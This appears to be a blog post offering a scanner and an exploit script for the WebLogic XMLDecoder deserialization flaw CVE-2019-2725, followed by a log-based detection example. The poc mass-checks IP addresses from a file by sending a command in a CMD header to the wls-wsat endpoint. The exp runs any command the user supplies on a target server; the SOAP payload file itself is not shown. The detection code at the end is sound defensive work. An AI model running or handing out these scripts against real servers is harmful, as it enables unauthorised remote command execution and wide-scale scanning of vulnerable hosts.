WebLogic deserialization remote code execution vulnerability exp (CVE-2019-2725)

Category: 颓废's Blog

Summary

The exploitation point is WebLogic's XMLDecoder deserialization vulnerability; what is new is a cleverly constructed gadget chain that bypasses the patches Oracle has shipped for this bug over the years.

Mainly I am just lazy, so without further ado, here are the exp and the poc. The poc is not universal; prefer the exp.

Put the target IPs into ip.txt, then run the poc to check them.

POC

import requests
import sys
import time
import random
import threading


def exec_cmd(ip, cmd):
    # Target servlet of the wls-wsat component; the command travels in the CMD header
    url = "http://" + ip + "/wls-wsat/CoordinatorPortType11"
    headers = {
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'CMD': cmd,
        'SOAPAction': '""',
        'Content-Type': 'text/xml'
    }
    # payload.txt holds the SOAP body; it is not included in the post
    with open('payload.txt', 'rb') as f:
        payloads = f.read()
    r = requests.post(url, headers=headers, data=payloads, timeout=5)
    return r.content.decode()


def test_poc(ip):
    # Echo a random token and look for it in the response
    check = str(int(time.time()) + int(random.uniform(1000, 9999)))
    out = exec_cmd(ip, 'echo ' + check)
    if check in out:
        print('vul finds:' + ip)


def main():
    print("put ips in ip.txt ")
    with open('ip.txt') as f:
        for line in f.readlines():
            try:
                test_poc(line)
            except:
                pass
    print("End")


if __name__ == '__main__':
    main()

exp

import requests
import sys


def exec_cmd(ip, cmd):
    # Same request shape as the poc: SOAP post to the wls-wsat servlet, command in the CMD header
    url = "http://" + ip + "/wls-wsat/CoordinatorPortType11"
    headers = {
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'CMD': cmd,
        'SOAPAction': '""',
        'Content-Type': 'text/xml'
    }
    # payload.txt holds the SOAP body; it is not included in the post
    with open('payload.txt', 'rb') as f:
        payloads = f.read()
    r = requests.post(url, headers=headers, data=payloads)
    return r.content.decode()


def main():
    if len(sys.argv) < 3:
        print('usage:exp.py www.0dayhack.com:8080 whoami')
        sys.exit()
    ip = sys.argv[1]
    cmd = sys.argv[2]
    out = exec_cmd(ip, cmd)
    print(out)


if __name__ == '__main__':
    main()
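Both scripts above send the same request shape: a POST to /wls-wsat/CoordinatorPortType11 with the User-Agent string Apache-HttpClient/4.1.1 (java 1.5). A defender can look for exactly that in web-server access logs. The following is an added detection example, not code from the post; the log lines are constructed, the combined log format and the assumption that any POST under /wls-wsat/ is worth flagging are mine.

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in Apache/Nginx "combined" log format (not from the post).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Apr/2019:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Apr/2019:10:01:07 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 1234 "-" "Apache-HttpClient/4.1.1 (java 1.5)"
10.0.0.9 - - [27/Apr/2019:10:01:09 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 200 421 "-" "Apache-HttpClient/4.1.1 (java 1.5)"
10.0.0.7 - - [27/Apr/2019:10:02:00 +0000] "GET /wls-wsat/CoordinatorPortType11 HTTP/1.1" 200 980 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Request shape used by the published scripts: SOAP POST to the wls-wsat servlet, fixed UA.
WSAT_PREFIX = "/wls-wsat/"
SCANNER_UA = "Apache-HttpClient/4.1.1 (java 1.5)"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec: Dict[str, str]) -> Optional[str]:
    """Return a severity label, or None when the request does not touch wls-wsat."""
    if not rec["path"].startswith(WSAT_PREFIX):
        return None
    if rec["method"] == "POST" and rec["ua"] == SCANNER_UA:
        return "high"      # exact shape of the poc/exp above
    if rec["method"] == "POST":
        return "medium"    # any SOAP post to the vulnerable component (assumption)
    return "low"           # GET: WSDL browsing / reconnaissance


def detect(log_text: str) -> List[Dict[str, str]]:
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sev = classify(rec)
        if sev:
            hits.append({"src": rec["src"], "path": rec["path"], "severity": sev})
    return hits


if __name__ == "__main__":
    for h in detect(SAMPLE_LOG):
        print(h)
```

Access logs do not record the CMD header, so the rule keys on method, path and User-Agent; a WAF or proxy that logs request headers can additionally alert on a CMD header reaching the wls-wsat path.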

Note:

Python 3 only.

ip.txt holds the targets to be checked.
